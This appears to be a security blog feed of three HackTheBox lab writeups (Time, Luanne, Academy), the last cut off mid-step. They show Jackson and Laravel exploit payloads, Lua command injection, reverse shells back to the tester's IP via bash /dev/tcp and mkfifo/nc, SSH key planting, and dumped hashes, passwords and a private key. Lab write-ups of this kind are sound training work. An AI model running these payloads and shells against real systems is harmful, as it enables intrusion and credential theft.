qwertty - cyber security blog qwertty is a blog for writeups and tutorials related to cyber security. 2021-04-06T08:00:00+02:00 qwertty https://qwertty.info/ [HTB] Time - Writeup https://qwertty.info/blog/htb-time-writeup 2021-04-06T08:00:00+02:00 2021-04-06T08:00:00+02:00

Preface: Time is a medium box on HackTheBox.eu. With an basic nmap scan we discovered two ports. On the port 80, http we find an JSON beautifier and validator. The validation option seems like a beta version and we are able to find a vulnerability to let us execute arbitrary code. Once we are on the box we find a bash script which is owned by our user. This script is scheduled and will be executed with root privileges. We will drop our ssh key to the .authorized_keys of the user root and are able to login as root. Hack the box infocard time

Information Gathering

As always we start with an nmap scan for open ports and services:

$ nmap -sV -sC -oA nmap/time 10.10.10.214
# Nmap 7.91 scan initiated Tue Nov  3 07:10:55 2020 as: nmap -sV -sC -oA nmap/time 10.10.10.214
Nmap scan report for 10.10.10.214
Host is up (0.10s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov  3 07:11:17 2020 -- 1 IP address (1 host up) scanned in 21.72 seconds

We got two open ports. The interesting one is for us the port 80, http. Nmap tells us that there is a JSON parser. So let's see what we can do there. htb-time-port-80

There are two options. One to beautify and one to validate a JSON string. The second options say's that this is a beta. Maybe we can find a vulnerability in it. I try a simple string to check if the validate function works. But there occures an unhandled error message. htb-time-validate-error

I extracted the error: Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'qwertty': was expecting ('true', 'false' or 'null')

The error message tells us there is a Java application in the background using the fasterxml library. A quick search with searchsploit gives us nothing. So let's try google. After some researching I found this link which is related to the CVE-2019-12384.

User

CVE-2019-12384

The CVE-2019-12384 allows an attacker to block the logback-core class from a polymorphic deserialization. Depending on the content, remote code execution is possible. So this is what we were looking for.

As in the link descriped we need a inject.sql. We use the one from the link. But I changed the payload to create a reverse shell.

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.14/4444 0>&1')

As always I start a python http server and my nc to catch the reverse shell. The last step for this CVE is the payload for the validator beta. I will also use the JSON payload from the link above. But I changed the localhost to my IP. ["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.14:8000/inject.sql'"}] htb-time-validate-payload

Now it is time to check the nc listener

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.214] 39252
bash: cannot set terminal process group (856): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$ whoami && hostname
whoami && hostname
pericles
time

Yes! We catched the reverse shell!

SHELL: pericles

Root

As always we start with LinPEAS on the box. I found a odd file called timer_backup.sh which is owned by our user.

[+] .sh files in path
/usr/bin/gettext.sh
You own the script: /usr/bin/timer_backup.sh
/usr/bin/rescan-scsi-bus.sh

Let's see what this bash script is doing:

$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip

Okay, the script create's a backup of /var/www/html and move it to the /root home directory. This indicates that the we have write access to the /root directory. So we could drop an ssh key to the authorized_keys and then login as root.

First we have to create a new ssh key.

$ ssh-keygen -f ~/htb/boxes/time/id_rsa               
Generating public/private rsa key pair.                                                
Enter passphrase (empty for no passphrase):                           
Enter same passphrase again:                                                           
Your identification has been saved in /home/qwertty/htb/boxes/time/id_rsa
Your public key has been saved in /home/qwertty/htb/boxes/time/id_rsa.pub
The key fingerprint is:                                                         

SHA256:Sa5EbkKsmU4t6ZYUYHxdMAqw035n0R1A57kbglEMKV4 qwertty@eagle

Now we can add the following line to the timer_backup.sh:

echo <SSH_PUB_KEY> >> /root/.ssh/authorized\_keys

Last but not least we have to check if we can login as root:

$ ssh -i id_rsa root@10.10.10.214
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-52-generic x86_64)

Last login: Tue Apr  6 05:58:43 2021 from 10.10.14.14
root@time:~# whoami && hostname
root
time

Yes, we gain root access.

SHELL: root


Thanks for reading! I hope you enjoyed it!

]]>
[HTB] Luanne - Writeup https://qwertty.info/blog/htb-luanne-writeup 2021-03-23T07:00:00+01:00 2021-03-23T07:00:00+01:00

Preface: Luanne is a easy box on HackTheBox.eu. With an basic nmap scan we discover two http ports. Both are restricted with an .htaccess file. But on port 80 there is a robots.txt file which reveals a subdirectory to us. On this subdirectory we will find with gobuster another directory. There we see a JSON response controlled by an GET parameter. With help of this GET parameter we are able to run arbitrary code through an SQLi attack. Once on the box we wll find a process owned by the user. With the process we are able to gain the private ssh key of the user. Within the users home directory we find a .tar.gz.enc archive which we have to decrypt an then we are able to unpack it. The archive contains a hash which we are able to crack. With the cracked password we are able spawn a root shell. Hack the box infocard luanne

Information Gathering

As always we start with an nmap scan for open ports and services:

$ cat nmap/luanne.nmap 
# Nmap 7.91 scan initiated Sat Dec  5 22:43:19 2020 as: nmap -sV -sC -oA nmap/luanne 10.10.10.218
Nmap scan report for 10.10.10.218
Host is up (0.10s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey: 
|   3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
|   521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_  256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp   open  http    nginx 1.19.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=.
| http-robots.txt: 1 disallowed entry 
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open  http    Medusa httpd 1.12 (Supervisor process manager)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  5 22:46:42 2020 -- 1 IP address (1 host up) scanned in 203.24 seconds

We got three open ports. On the port 9001 it looks like we need some credentials because the output tells us 401 Unauthorized. The port 80 got a similar output but reveals a subdirectory called weather to us. It is a disallowed entry in the robots.txt.

Gobuster

Before we take a look in the browser let's start a gobuster on the subdirectory weather. I like it to have some enumeration in the background.

$ gobuster dir -u http://10.10.10.218/weather/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Now it is time to open http://10.10.10.218 in the browser. But as we assumed earlier it is protected by .htaccess. We have to enter a username and a password. Hack the box luanne ip htaccess

I tried some standard credentials without success. The web server always respond with the 401 Unauthorized message. Hack the box luanne ip browser

On the port 9001 we have the same behavior. It is also protected by an .htaccess file. None of the standard credentials I tried worked. Got always the respond Error response with the code 401 Unauthorized. Hack the box luanne ip port 9001

Let's see if gobuster got something interessting for us.

$ gobuster dir -u http://10.10.10.218/weather/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================  
Gobuster v3.0.1  
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@\_FireFart\_)  
===============================================================  
[+\] Url:            http://10.10.10.218/weather/  
[+\] Threads:        10  
[+\] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  
[+\] Status codes:   200,204,301,302,307,401,403  
[+\] User Agent:     gobuster/3.0.1  
[+\] Timeout:        10s  
===============================================================  
2020/12/04 01:40:43 Starting gobuster  
===============================================================  
/forecast (Status: 200)
===============================================================  
2020/12/04 01:50:23 Finished  
===============================================================  

Indeed we found another subdirectory called forecast. The most interessting part is the response code 200. This means we can access this subdirectory without providing credentials.

Let's have a look what the /forecast directory got for us. But be cautious, we ran the gobuster on the /weather subdirectory. This means we have to look on the link http://10.10.10.218/weather/forecast. Hack the box luanne ip weather forecast

We got a JSON response. The firefox automatically converts the result in a pretty UI. The message of the response gives us a important hint: No city specified. Use 'city=list' to list available cities.

There is a GET parameter city where we can provide some data. Let's see what the suggested list will reveal to us. Hack the box luanne forecast city list

Only a bunch of cities. Nothing interesting for us. But my experience says that this could be vulnerable to a SQL Injection. First we should try to break the response. To break the response I will use my terminal with cURL. I always try at first the following characters to break the query: ', " and ;. Let's see If we can cause an error message.

$ curl -s http://10.10.10.218/weather/forecast?city=%27;
<br>Lua error: /usr/local/webapi/weather.lua:49: attempt to call a nil value

Nice, we got a error message by providing the characters ';. Now we know that the application runs lua.

Foothold

We know that the application runs lua. So we should first try if we can execute some code. To avoid to run into a rabbit hole. After a quick google search I found a useful link from GTFOBins. With os.execute() we can run OS commands. Now it is time to prove it.

$ curl -s 'http://10.10.10.218/weather/forecast?city=%27);os.execute(%22id%22);--'
{"code": 500,"error": "unknown city: uid=24(_httpd) gid=24(_httpd) groups=24(_httpd)

Yes! We got remote code execution as _httpd! Next I will check which OS is running on this box.

$ curl -s 'http://10.10.10.218/weather/forecast?city=%27);os.execute(%22uname%20-a%22);--'
{"code": 500,"error": "unknown city: NetBSD luanne.htb 9.0 NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020  mkrepro@mkrepro.NetBSD.org:/usr/src/sys/arch/amd64/compile/GENERIC amd64

There is NetBSD running. So we can create a reverse shell with a basic sh and mkfifo. Because bash is not always available on NetBSD. First start our nc listener as always.

$ nc -lvnp 4444
listening on [any] 4444 ...

Now it is time to pop our reverse shell.

$ curl -s 'http://10.10.10.218/weather/forecast?city=%27);os.execute(%22rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.3%204444%20%3E/tmp/f%22);--'

Let's check our nc listener

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.218] 65495
sh: can't access tty; job control turned off
$ whoami
_httpd
$ hostname
luanne.htb

Awesome! We got a shell.

SHELL: _httpd

User

Now it is time to gather informations on the host. My first thought was: there have to be a .htaccess file in the /var/www directory which leaks some credentials.

$ pwd
/var/www
$ ls -la
total 20
drwxr-xr-x   2 root  wheel  512 Nov 25 11:27 .
drwxr-xr-x  24 root  wheel  512 Nov 24 09:55 ..
-rw-r--r--   1 root  wheel   47 Sep 16  2020 .htpasswd
-rw-r--r--   1 root  wheel  386 Sep 17  2020 index.html
-rw-r--r--   1 root  wheel   78 Nov 25 11:38 robots.txt
$ cat .htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

We did not found the .htaccess file but a .htpasswd file which contains some credentials. Now it is time to try if we can crack the hash of the user webapi_user.

John

I will use john to crack the hash. First I created a file called hashes which contains the actual hash. As wordlist I use the rockyou.txt. Now it is time to run john.

$ john hashes -w=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iamthebest       (?)
1g 0:00:00:00 DONE (2021-03-24 07:57) 20.00g/s 61440p/s 61440c/s 61440C/s secrets..ANTHONY
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Nice! We could crack the hash. Now we got the credentials webapi_user:iamthebest.

In the beginning of our enumeration we discovered that the port 80 and 9001 are protected by an .htaccess file. Let's try these credentials on the ports.

They worked on port 80 but we didn't get anything new. Hack the box luanne ip creds browser

On port 9001 the credentials does not work. So we have to enumerate further on the box.

LinPEAS

As always I try at first linpeas.sh on the box. To see if we got something interesting. One process catched my attention. It looks pretty odd.

================================( Processes, Cron, Services, Timers & Sockets )================================                                                                                      
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
# ...
r.michaels  185  0.0  0.0  34992  1972 ?     Is    7:09PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -
U r.michaels -b /home/r.michaels/devel/www 
# ...

It is the httpd process running on the localhost owned by r.michaels with a bunch of arguments and flags. Before we invest more time to this process we should check if we are able to get responses from the httpd daemon.

$ curl -s localhost:3001
<html><head><title>401 Unauthorized</title></head>
<body><h1>401 Unauthorized</h1>
/: <pre>No authorization</pre>
<hr><address><a href="//localhost:3001/">localhost:3001</a></address>
</body></html>

The same result like the port 80. 401 Unauthorized. Maybe the credentials we cracked with john works here also.

$ curl -s --user webapi_user:iamthebest localhost:3001
<!doctype html>
<html>
  <head>
    <title>Index</title>
  </head>
  <body>
    <p><h3>Weather Forecast API</h3></p>
    <p><h4>List available cities:</h4></p>
    <a href="/weather/forecast?city=list">/weather/forecast?city=list</a>
    <p><h4>Five day forecast (London)</h4></p>
    <a href="/weather/forecast?city=London">/weather/forecast?city=London</a>
    <hr>
  </body>
</html>

Yes, now we got a proper response. But it looks like the same as on port 80. I think this is the developing process for r.michaels. The process is running in the home directory of r.michaels. Maybe we can use this fact to our advantage.

After some google searches I found something interessting on the official apache documentation.

On systems with multiple users, each user can be permitted to have a web site in their home directory using the [UserDir] directive. Visitors to a URL http://example.com/~username/ will get content out of the home directory of the user "username", out of the subdirectory specified by the [UserDir] directive.

This means we can access files from the r.michaels users home with a cURL request. Maybe we can gain a directory listing.

$ curl -s --user webapi_user:iamthebest localhost:3001/~r.michaels/
<!DOCTYPE html>
<html><head><meta charset="utf-8"/>
<style type="text/css">
table {
        border-top: 1px solid black;
        border-bottom: 1px solid black;
}
th { background: aquamarine; }
tr:nth-child(even) { background: lavender; }
</style>
<title>Index of ~r.michaels/</title></head>
<body><h1>Index of ~r.michaels/</h1>
<table cols=3>
<thead>
<tr><th>Name<th>Last modified<th align=right>Size
<tbody>
<tr><td><a href="../">Parent Directory</a><td>16-Sep-2020 18:20<td align=right>1kB
<tr><td><a href="id_rsa">id_rsa</a><td>16-Sep-2020 16:52<td align=right>3kB
</table>
</body></html>

Indeed, we are able to see what is in the directory. There is just one file. The id_rsa. I think this is the private key of r.michaels. Maybe we are able to get the content of the id_rsa by making a request on it. I give it a try.

$ curl -s --user webapi_user:iamthebest localhost:3001/~r.michaels/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Oh yeah, there it is! I try to ssh into the box with the key.

$ ssh -i id_rsa r.michaels@10.10.10.218
Last login: Thu Mar 25 20:06:43 2021 from 10.10.14.11
NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020

Welcome to NetBSD!

luanne$ whoami && hostname
r.michaels
luanne.htb

Nice! We are on the box as r.michaels.

SHELL: r.michaels

Root

First let's take a look if we got something interessting on our home directory. After some pocking I found the ~/backups/devel_backup-2020-09-16.tar.gz.enc archive file. So let's try if we can extract the archive.

After some researching I found out that this .tar archive is encrypted with a private key. On NetBSD this is possible with netpgp. So I guess we have to extract this on the machine locally. Let's try it.

luanne$ netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc > /tmp/backup.tar.gz                    
signature  2048/RSA (Encrypt or Sign) 3684eb1e5ded454a 2020-09-14 
Key fingerprint: 027a 3243 0691 2e46 0c29 9f46 3684 eb1e 5ded 454a 
uid              RSA 2048-bit key <r.michaels@localhost>
luanne$ cd /tmp
luanne$ ls
backup.tar.gz

Nice! We could decrypt the .tar archive. Now let's unpack it.

luanne$ tar -xvf backup.tar.gz                                    
x devel-2020-09-16/
x devel-2020-09-16/www/
x devel-2020-09-16/webapi/
x devel-2020-09-16/webapi/weather.lua
x devel-2020-09-16/www/index.html
x devel-2020-09-16/www/.htpasswd

The first file which catched my attention is this .htpasswd file. The other files should not be very interesting for us. Let's check the content of .htpasswd.

luanne$ cd devel-2020-09-16/www/                                     
luanne$ cat .htpasswd
webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

Another password hash. It is again time for john. I append the new hash to my existing hashes file and ran the same command again.

$ john hashes -w=/usr/share/wordlists/rockyou.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Remaining 1 password hash
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
littlebear       (?)
1g 0:00:00:00 DONE (2021-03-25 21:14) 5.555g/s 72533p/s 72533c/s 72533C/s tormenta..hello11
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Nice! We got the password littlebear. When I am on a target machine I try always to use new discovered passwords to switch to root.

luanne$ su  
su: You are not listed in the correct secondary group (wheel) to su root.
su: Sorry: Authentication error
luanne$ sudo /bin/sh
ksh: sudo: not found

Okay, neither su or sudo works. sudo is not even installed on the NetBSD system. Let's see what's the equivalent to sudo on NetBSD. On a quick google search I found this useful link. They suggest to use doas instead of sudo. I never used doas before. So I checked the man page of doas.

-u user Execute the command as user. The default is root.

The default user is root. So we can just try to run doas /bin/sh to spawn a root shell with the password littlebear.

luanne$ doas /bin/sh
Password:
# whoami 
root
# id
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)

Oh yes! doas with the cracked password hash worked! We gained a root shell!

SHELL: root


Thanks for reading! I hope you enjoyed it!

]]>
[HTB] Academy - Writeup https://qwertty.info/blog/htb-academy-writeup 2020-12-30T08:20:00+01:00 2020-12-30T08:20:00+01:00

Preface: Academy is a easy box on HackTheBox.eu. We will find a register form on port 80. Where we intercept the register request to gain more administration priviliges. Next we discover a subdomain which seems to be a developing page. After some enumeration we can use some of these informations to gain a reverse shell. Through some environment files we get some credentials to gain a privileged shell. With furhter enumeration we will find more credentials to another user. With this user we have sudo rights for one specific binary. So we will use this for privilege escalation. Hack the box infocard academy

Information gathering

As always we start with an nmap scan for open ports and services:

$ nmap -sV -sC -oA nmap/academy 10.10.10.215
# Nmap 7.91 scan initiated Sat Nov  7 23:23:54 2020 as: nmap -sV -sC -oA nmap/academy 10.10.10.215
Nmap scan report for academy.htb (10.10.10.215)
Host is up (0.10s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov  7 23:24:16 2020 -- 1 IP address (1 host up) scanned in 22.20 seconds

We got http on port 80 and ssh on port 22. On port 80 it looks like there is a Academy site on it. Let's take a look into the browser. We will redirected to academy.htb so we have to add this vhost to our /etc/hosts file. Now we can visit the page. We only have two options: Login or Register.

Before we start to poke around on the Register form, we start a gobuster. It is always good to have some enumeration in the background.

 $ gobuster dir -u http://10.10.10.215 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:                   http://10.10.10.215
[+] Threads:          10
[+] Wordlist:           /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:      gobuster/3.0.1
[+] Extensions:      php
[+] Timeout:          10s
===============================================================
2021/11/10 08:53:45 Starting gobuster
===============================================================
...

Now I will take a closer look on the Register form. On the page source I found something interesting:

<input type="hidden" value="0" name="roleid" />

The formula contains a hidden input with the name roleid. I would guess if we change the value we gain more privileges.

But before we try to change the value, let's take a look on the result of our gobuster:

/index.php (Status: 200)
/login.php (Status: 200)
/register.php (Status: 200)
/admin.php (Status: 200)
/config.php (Status: 200)
/home.php (Status: 302)

The admin.php looks interesting. I think we can gain more informations from it.

First I create a normal user without changing the roleid value. To check if we can access the admin.php and we can't. We got the login form. So let's try to increment the value by one with burp.

Academy burp roleid

After sendig the request, we got an 302 Found response. Let's login on http://academy.htb/admin.php. My thought confirmed. We found some useful informations.

Academy admin.php planner

We found two things which are interesting for us:

  • Potential usernames: cry0l1t3 and mrb3n
  • One subdomain: dev-staging-01.academy.htb

The state of dev-staging-01.academy.htb is still pending. I think we should take first a look on that. But first we have to add the subdomain to our /etc/hosts file.

Academy subdomain dev-staging.academy.htb laravel

The error message tells us that we got an laravel application:

The stream or file "/var/www/html/htb-academy-dev-01/storage/logs/laravel.log" could not be opened in append mode: failed to open stream: Permission denied

Foothold

After some enumeration on laravel I found the CVE-2018–15133. I think this is the one we need. For this vulnerability we need the APP_KEY which we can find on the subdomain. Because the app is leaking it, caused by the error and the developing settings. I searched a POC and found one: https://github.com/aljavier/exploit_laravel_cve-2018-15133.

$ python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c whoami
www-data

So we got RCE. It's time for a reverse shell :) As usual I start my listener: nc -lvnp 4444.

Now we exploit the laravel app:

$ python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.**.** 4444 >/tmp/f"

And boom, we got the shell:

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.14.4] 43854
Running in interactive mode. Press CTRL+C to exit.
$ whoami
www-data

$ uname -a
Linux academy 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

SHELL: www-data

User

I think we can found some credentials in the .env file of the laravel installation. Maybe they are using some database.

$ pwd            
/var/www/html/academy
$ cat .env          
...                                            
DB_CONNECTION=mysql 
DB_HOST=127.0.0.1
DB_PORT=3306  
DB_DATABASE=academy
DB_USERNAME=dev   
DB_PASSWORD=mySup3rP4s5w0rd!!
...

So there we go. Let's take a look into the /home directory. Because dev is not a valid username.

$ ls /home
21y4d
ch4p
cry0l1t3
egre55
g0blin
mrb3n

We got a bunch of users. But on the http://academy.htb/admin.php page we got two usernames. Let's try these at first.

$ ssh cry0l1t3@10.10.10.215
cry0l1t3@10.10.10.215's password: 

$ whoami
cry0l1t3

SHELL: cry0l1t3

Root

On the basic checks on my user I discovered that we are a member of the adm group. That implies we can read a bunch of .log files.

After some enumeration I discovered a logged entry of su command:

$ pwd
/var/log/audit

$ grep 'comm="su"' *
audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A

The data section looks like an HEX value. Maybe we can convert it to ASCII:

$ echo 6D7262336E5F41634064336D79210A | xxd -r -p
mrb3n_Ac@d3my!

I think this is the password for the user mrb3n:

$ ssh mrb3n@10.10.10.215
mrb3n@10.10.10.215's password: 

$ whoami
mrb3n

SHELL: mrb3n

On the basic enumerations with the user mrb3n I discovered that we have sudo permissions on the /usr/bin/composer:

$ sudo -l
[sudo] password for mrb3n: 
Matching Defaults entries for mrb3n on academy:
